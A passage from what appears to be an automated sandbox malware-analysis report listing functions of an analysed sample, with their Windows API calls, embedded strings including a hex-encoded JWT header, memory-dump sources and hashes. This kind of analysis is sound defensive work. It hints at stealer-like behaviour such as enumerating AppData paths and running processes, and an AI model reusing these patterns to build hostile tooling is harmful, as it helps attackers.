                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long$yxxx$yxxx
                          • API String ID: 2002836212-1517697755
                          • Opcode ID: 40a3e08a83e48af540604f2c1f0cfc64a9bd54b6c360b52c3d86bbfadb7902f7
                          • Instruction ID: 5a76f98d01e3efc5b547228f86aafedfa7f12455862252d3672263eb84a19b8a
                          • Opcode Fuzzy Hash: 40a3e08a83e48af540604f2c1f0cfc64a9bd54b6c360b52c3d86bbfadb7902f7
                          • Instruction Fuzzy Hash: E3F0B437F000220F8316663D9D8449EA94BD7E639033AD735E81AEF359DC72EC8295D4
                          APIs
                            • Part of subcall function 003C781C: __mtinitlocknum.LIBCMT ref: 003C7832
                            • Part of subcall function 003C781C: __amsg_exit.LIBCMT ref: 003C783E
                          • ___addlocaleref.LIBCMT ref: 003C8756
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                          • String ID: KERNEL32.DLL$Xu=$xt=
                          • API String ID: 3105635775-3214832763
                          • Opcode ID: 7b209e20a5d05635be71e2d36177b32122372c02795e5c78c7ebec4c85a63a4e
                          • Instruction ID: 626212b4d57ae5b6014f7cc2671d3c36af4201046b184b833e73c0292434af51
                          • Opcode Fuzzy Hash: 7b209e20a5d05635be71e2d36177b32122372c02795e5c78c7ebec4c85a63a4e
                          • Instruction Fuzzy Hash: 5E01C871445B009ED722AF75D806B49F7E0AF01314F20890EE5DA9B2E0CFB4AE04CF11
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003BE544
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BE573
                          • lstrcat.KERNEL32(?,00000000), ref: 003BE581
                          • lstrcat.KERNEL32(?,00F2DB40), ref: 003BE59C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: 5bf4a78a507bd46f53122f53b4e67530e558deeecae83e83631280b2cf888589
                          • Instruction ID: 92e10b396c5fcdca38295eadc11e64b74d27b15023909152834c9150966c188a
                          • Opcode Fuzzy Hash: 5bf4a78a507bd46f53122f53b4e67530e558deeecae83e83631280b2cf888589
                          • Instruction Fuzzy Hash: B351B975A11108AFD766EB58DC52EFE33BDEB59300F04445FFA068B251EE70AE448B91
                          APIs
                          Strings
                          • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 003C1FDF, 003C1FF5, 003C20B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: strlen
                          • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                          • API String ID: 39653677-4138519520
                          • Opcode ID: 9944943ed3be9d4b130bc3aaf7d3347dfb35e7b53d611036a26b018f73c8c932
                          • Instruction ID: c53bebad6cb257fd64ce34044355ea77d33e112d3ba648cd8d1a7443c17855d6
                          • Opcode Fuzzy Hash: 9944943ed3be9d4b130bc3aaf7d3347dfb35e7b53d611036a26b018f73c8c932
                          • Instruction Fuzzy Hash: 32215A395102A98FC722EB35D444BDEF36ADF80362F85445BC8188B691E3321D0ED796
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003BEBB4
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BEBE3
                          • lstrcat.KERNEL32(?,00000000), ref: 003BEBF1
                          • lstrcat.KERNEL32(?,00F2EBC0), ref: 003BEC0C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: 9e96703509a97e90a9ecdf39b01e911218035d119166564a23acb0f05af3d9fb
                          • Instruction ID: 7f3a32c39b25982d8678ae7e40ba3b3396b8a9f14baa0e1e10a64143a56ca827
                          • Opcode Fuzzy Hash: 9e96703509a97e90a9ecdf39b01e911218035d119166564a23acb0f05af3d9fb
                          • Instruction Fuzzy Hash: 5E31A771A1111DABCB26EF68EC46BEE73B4FF59300F1004A9FA06DB250DE309E548B90
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,003CA3D0,000000FF), ref: 003C2B8F
                          • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 003C2B96
                          • GetLocalTime.KERNEL32(?,?,00000000,003CA3D0,000000FF), ref: 003C2BA2
                          • wsprintfA.USER32 ref: 003C2BCE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: 4eaca5bac3beafca8ca9a7cc3981feb7892f161a442acc30255686f5b7cc3fe8
                          • Instruction ID: 50c9d53067ce8743c2a412729a12d690e1b25f8732a10dd77b1f38833ce7fcf4
                          • Opcode Fuzzy Hash: 4eaca5bac3beafca8ca9a7cc3981feb7892f161a442acc30255686f5b7cc3fe8
                          • Instruction Fuzzy Hash: BD0140B2905528ABCB249BC9ED49FBEB7BCFB4CB11F00011BF605A2280E7785944D7B1
                          APIs
                          • OpenProcess.KERNEL32(00000410,00000000), ref: 003C4492
                          • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 003C44AD
                          • CloseHandle.KERNEL32(00000000), ref: 003C44B4
                          • lstrcpy.KERNEL32(00000000,?), ref: 003C44E7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                          • String ID:
                          • API String ID: 4028989146-0
                          • Opcode ID: 471034931392acd604d3bf6d556fccaaaa1f7d4ab7d0117f46f6b67f03b2c72c
                          • Instruction ID: 67c9dc5db1c20fee1fe5572560985c19a8ca693f60ff2312eec9c378d7cd3dec
                          • Opcode Fuzzy Hash: 471034931392acd604d3bf6d556fccaaaa1f7d4ab7d0117f46f6b67f03b2c72c
                          • Instruction Fuzzy Hash: F6F0FCB09026256BE7319B759C4DFE6BBA8EF14704F154596FA45D7180DBB08C84C790
                          APIs
                          • __getptd.LIBCMT ref: 003C8FDD
                            • Part of subcall function 003C87FF: __amsg_exit.LIBCMT ref: 003C880F
                          • __getptd.LIBCMT ref: 003C8FF4
                          • __amsg_exit.LIBCMT ref: 003C9002
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 003C9026
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: 3d484e27bc346d84ff5585e2c1d019c7adbb183f8efd2c4a05adc2485b8cc69c
                          • Instruction ID: 47b069dccb6aaadb00da2d67ddb93ad3a493a40d977688b67255959da34a0fe6
                          • Opcode Fuzzy Hash: 3d484e27bc346d84ff5585e2c1d019c7adbb183f8efd2c4a05adc2485b8cc69c
                          • Instruction Fuzzy Hash: 55F062329097209BD663BB78680BF5923A16F00711F26420EF545EE2D2DF645D00DB55
                          APIs
                          • lstrlen.KERNEL32(------,003A5BEB), ref: 003C731B
                          • lstrcpy.KERNEL32(00000000), ref: 003C733F
                          • lstrcat.KERNEL32(?,------), ref: 003C7349
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcatlstrcpylstrlen
                          • String ID: ------
                          • API String ID: 3050337572-882505780
                          • Opcode ID: f43f2035b07834af3e24ffd992d2bcca7dba50f10d04685ddd864cdee355e05b
                          • Instruction ID: 782eb9f6476e79ccbe698a43ba246d0a9778d5a71051869c55c72566ee9e974c
                          • Opcode Fuzzy Hash: f43f2035b07834af3e24ffd992d2bcca7dba50f10d04685ddd864cdee355e05b
                          • Instruction Fuzzy Hash: 2EF039789013029FCB269F35DC48A27BBF9EF94B00318882EAC9AC7214EB30D840DF50
                          APIs
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A1557
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A1579
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A159B
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A15FF
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B3422
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B344B
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B3471
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B3497
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: 47af731740e7c5dc5444f30753c3d6b6b6d888db01a349294b11491eb90bdfec
                          • Instruction ID: 3abb6d6e59dcdfcb239c260beccc25cee2bc4f0c912ea37e320894acaae231ec
                          • Opcode Fuzzy Hash: 47af731740e7c5dc5444f30753c3d6b6b6d888db01a349294b11491eb90bdfec
                          • Instruction Fuzzy Hash: AD121E70A022218FDB2ACF19C554B65B7E4BF45718B1AC0AEE909CB7A1D772ED42CF40
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 003B7C94
                          • std::_Xinvalid_argument.LIBCPMT ref: 003B7CAF
                            • Part of subcall function 003B7D40: std::_Xinvalid_argument.LIBCPMT ref: 003B7D58
                            • Part of subcall function 003B7D40: std::_Xinvalid_argument.LIBCPMT ref: 003B7D76
                            • Part of subcall function 003B7D40: std::_Xinvalid_argument.LIBCPMT ref: 003B7D91
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: string too long
                          • API String ID: 909987262-2556327735
                          • Opcode ID: 98773cf5fba7b9268b2aa7563d061846b132ce700f6bf58dc9147b4b55d1dee5
                          • Instruction ID: 4b810c1fb9a169d0145b23ce87ad87e4023f5db1f14fa17ef255c7eb56069bb9
                          • Opcode Fuzzy Hash: 98773cf5fba7b9268b2aa7563d061846b132ce700f6bf58dc9147b4b55d1dee5
                          • Instruction Fuzzy Hash: 16310B723086144BD736DD6CE8809AAFBE9DFD1758B21462FF646CBE41C7719C418394
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,?), ref: 003A6F74
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003A6F7B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
